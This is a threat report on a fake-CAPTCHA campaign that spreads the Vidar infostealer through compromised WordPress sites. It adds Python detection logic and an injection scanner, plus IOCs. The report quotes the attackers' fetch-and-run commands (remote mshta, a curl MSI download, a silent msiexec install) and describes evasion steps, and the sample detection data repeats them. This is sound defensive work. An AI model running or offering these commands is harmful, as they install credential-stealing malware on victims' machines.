Over the past few years, attackers have increasingly shifted toward social engineering techniques rather than relying solely on software vulnerabilities. One such method, commonly referred to as ClickFix or fake CAPTCHA abuse, has gained significant traction.
In this campaign, threat actors trick users into executing malicious commands themselves. This report outlines a recently observed operation delivering the Vidar infostealer through multiple infection paths, primarily leveraging compromised WordPress websites and deceptive verification pages.

2. Campaign Overview
Researchers identified a widespread campaign targeting users across multiple regions, including:
- Italy
- France
- United States
- United Kingdom
- Brazil
The attack chain begins when users land on compromised WordPress sites that display a fake human verification (CAPTCHA) page. Instead of performing a real verification, users are instructed to execute a command, unknowingly initiating malware delivery.
3. Malware Profile: Vidar Infostealer
Vidar is a well-established information-stealing malware designed to extract sensitive data from infected systems. Its capabilities include:
- Harvesting browser credentials (usernames and passwords)
- Extracting cryptocurrency wallet data
- Collecting session cookies and authentication tokens
- Accessing autofill and stored payment information
- Searching for files containing sensitive or valuable data
A key characteristic of Vidar is its ability to operate in memory, which helps it avoid detection while silently exfiltrating stolen information to remote servers.
4. Initial Access Vector: Fake CAPTCHA Pages
When visiting a compromised site, users are presented with a page mimicking a legitimate verification service (similar to Cloudflare’s “Verify you are human” prompt).
Instead of solving a CAPTCHA, users are asked to run a command such as:
mshta https://{compromised-site}/challenge/cf
Why this works:
- mshta.exe is a legitimate Windows utility used to execute HTML Applications (HTA).
- Because it is a trusted system binary, attackers abuse it to bypass security controls.
This marks the beginning of the infection chain.
5. Infection Chain Breakdown
5.1 HTA Execution Stage
The executed command launches an obfuscated HTA script that performs several stealthy actions:
- Shrinks its window to 0x0 size and moves it off-screen
- Verifies the execution context (must originate from HTTP/HTTPS)
- Decodes embedded strings using XOR with randomized keys
- Queries system information via WMI (including antivirus presence)
- Creates hidden working directories under: \AppData\Local
5.2 MSI Payload Delivery
The HTA script downloads a malicious MSI installer using a command similar to:
curl.exe -s -L -o <path>\cleankises.msi https://{compromised-site}/payload.msi
The downloaded file is validated (it must exceed 100 KB), and metadata such as the Zone.Identifier stream (the Mark of the Web) is removed to reduce detection. The installer is then executed silently:
msiexec.exe /i <path>\cleankises.msi /qn
5.3 MSI and Loader Execution
Inside the MSI package:
- A CustomAction (ConfigureNetFx) is defined
- This action launches a Go-based malware loader
Loader Responsibilities:
- Decrypt and execute the final payload
- Maintain stealth and evade analysis
5.4 Anti-Analysis Techniques
The loader performs multiple checks to detect debugging or sandbox environments:
- CheckRemoteDebuggerPresent
- IsDebuggerPresent
- QueryPerformanceCounter
- GetTickCount
After passing these checks, the loader decrypts and executes Vidar directly in memory, avoiding disk-based detection.
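The chain in sections 5.1 to 5.4 leaves a recognisable process-creation footprint (mshta fetching a remote HTA, curl writing an MSI under AppData\Local, msiexec installing it silently). The following detection logic is an added example, not code from the report; it runs over constructed Sysmon-style events with made-up hostnames and paths, and the rule names are assumptions.

```python
import re
# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields),
# not real telemetry: (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta https://compromised.example/challenge/cf"),
    ("C:\\Windows\\System32\\mshta.exe", "C:\\Windows\\System32\\curl.exe",
     "curl.exe -s -L -o C:\\Users\\u\\AppData\\Local\\x\\cleankises.msi "
     "https://compromised.example/payload.msi"),
    ("C:\\Windows\\System32\\mshta.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec.exe /i C:\\Users\\u\\AppData\\Local\\x\\cleankises.msi /qn"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec.exe /i C:\\Temp\\vendor.msi"),   # benign control: interactive, outside profile
]

URL = re.compile(r"https?://", re.I)
APPDATA_MSI = re.compile(r"\\AppData\\Local\\[^\s\"]*\.msi", re.I)
SILENT = re.compile(r"\s/qn\b", re.I)
CHAIN = ["mshta_remote_hta", "curl_msi_to_appdata", "silent_msi_from_appdata"]

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the rule names an event trips (empty list = nothing suspicious)."""
    parent, image, cmd = event
    name, hits = image_name(image), []
    if name == "mshta.exe" and URL.search(cmd):
        hits.append("mshta_remote_hta")            # 5.1: HTA fetched over HTTP(S)
    if name == "curl.exe" and URL.search(cmd) and APPDATA_MSI.search(cmd):
        hits.append("curl_msi_to_appdata")         # 5.2: MSI dropped under AppData\Local
    if name == "msiexec.exe" and APPDATA_MSI.search(cmd) and SILENT.search(cmd):
        hits.append("silent_msi_from_appdata")     # 5.2: silent install of that MSI
    if image_name(parent) == "mshta.exe" and name in ("curl.exe", "msiexec.exe"):
        hits.append("mshta_child_process")         # parent/child relationship of the chain
    return hits

def chain_observed(events):
    """True when the three chain stages fire in order across the event stream."""
    pending = list(CHAIN)
    for ev in events:
        if pending and pending[0] in classify(ev):
            pending.pop(0)
    return not pending

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(image_name(ev[1]), classify(ev))
    print("full chain observed:", chain_observed(SAMPLE_EVENTS))
```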
6. Compromised WordPress Infrastructure
The campaign relies heavily on infected WordPress websites.
6.1 Malicious Injection Mechanism
Injected code loads malicious content through iframe sources such as:
- cdnwoopress[.]com
- woopresscdn[.]com
These domains act as payload delivery infrastructure.
6.2 Backend Functionality
Due to a misconfiguration, researchers were able to observe backend behavior. The injected script performs:
- Creation of a malicious plugin file: wp-cache-manager.php
- Periodic “heartbeat” communication with attacker servers (every hour)
- Collection of site metadata:
  - Domain
  - URL
  - WordPress version
  - Site status
6.3 Target Filtering
The script selectively targets victims:
- Filters based on User-Agent
- Focuses on Windows desktop users
- Replaces legitimate page content with attacker-controlled HTML
Payload delivery commands are retrieved from:
/api/get_payload
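A site owner checking for the compromise described in section 6 can look for the two observable artifacts: iframe or script sources pointing at the delivery domains (6.1) and the rogue plugin file (6.2). This scanner is an added example, not code from the report; the sample page and file listing are constructed.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse
# Iframe delivery domains from section 6.1, kept defanged as in the report and
# refanged only for matching; the rogue plugin file name is from section 6.2.
DEFANGED_DOMAINS = ["cdnwoopress[.]com", "woopresscdn[.]com"]
ROGUE_PLUGIN_FILE = "wp-cache-manager.php"

def refang(domain):
    return domain.replace("[.]", ".").lower()

BAD_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}

class SourceCollector(HTMLParser):
    """Collect the src attribute of every iframe and script tag in a page."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script"):
            self.sources += [v for k, v in attrs if k == "src" and v]

def suspicious_sources(html):
    """Return iframe/script sources whose host is a known bad domain or a subdomain of one."""
    parser = SourceCollector()
    parser.feed(html)
    bad = []
    for src in parser.sources:
        host = (urlparse(src).hostname or "").lower()   # handles https://, // and relative
        if any(host == d or host.endswith("." + d) for d in BAD_DOMAINS):
            bad.append(src)
    return bad

def rogue_plugin_paths(paths):
    """From a file listing (e.g. collected with os.walk), pick the rogue plugin file."""
    return [p for p in paths if os.path.basename(p).lower() == ROGUE_PLUGIN_FILE]

# Constructed sample page and file listing, not captured from a real site.
SAMPLE_HTML = """<html><body>
<script src="/wp-includes/js/jquery.js"></script>
<iframe src="https://cdnwoopress.com/challenge/cf" style="display:none"></iframe>
<iframe src="https://www.youtube.com/embed/abc"></iframe>
</body></html>"""
SAMPLE_FILES = ["wp-content/plugins/akismet/akismet.php",
                "wp-content/plugins/wp-cache-manager.php",
                "wp-content/mu-plugins/WP-Cache-Manager.PHP"]

if __name__ == "__main__":
    print("injected sources:", suspicious_sources(SAMPLE_HTML))
    print("rogue plugin files:", rogue_plugin_paths(SAMPLE_FILES))
```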
7. Indicators of Compromise (IOCs)
7.1 Malicious Domains
- cdnwoopress[.]com — Fake CAPTCHA infrastructure
- woopresscdn[.]com — Fake CAPTCHA infrastructure
- walwood[.]be — Fake CAPTCHA infrastructure
7.2 Command and Control (C2)
- telegram[.]me/dikkh0k
- telegram[.]me/pr55ii
- steamcommunity[.]com/profiles/76561198742377525
- steamcommunity[.]com/profiles/76561198735736086
8. Defensive Recommendations
This attack relies heavily on user interaction, so awareness and basic hygiene play a critical role.
8.1 User Awareness
- Never execute commands from websites claiming to “verify” you
- Treat any request involving Win+R, PowerShell, or Terminal as suspicious
8.2 Verification Practices
- Cross-check instructions through official documentation
- Avoid trusting on-page instructions blindly
8.3 Safe Command Handling
- Avoid copy-pasting commands from unknown sources
- If necessary, type commands manually to prevent hidden payload execution
8.4 Endpoint Protection
- Keep OS and browsers updated
- Use endpoint security tools capable of detecting infostealers
- Enable browser protections against malicious scripts
8.5 Threat Awareness
Attack techniques like fake CAPTCHA pages continue to evolve. Recognizing that attackers may rely on human behavior rather than exploits is key to prevention.
9. Conclusion
This campaign highlights a growing trend in cyber threats: manipulating users instead of exploiting systems. By abusing trusted tools like mshta and msiexec, attackers reduce their reliance on vulnerabilities and increase success rates. Organizations should focus not only on technical defenses but also on user education and behavioral detection to effectively mitigate such threats.
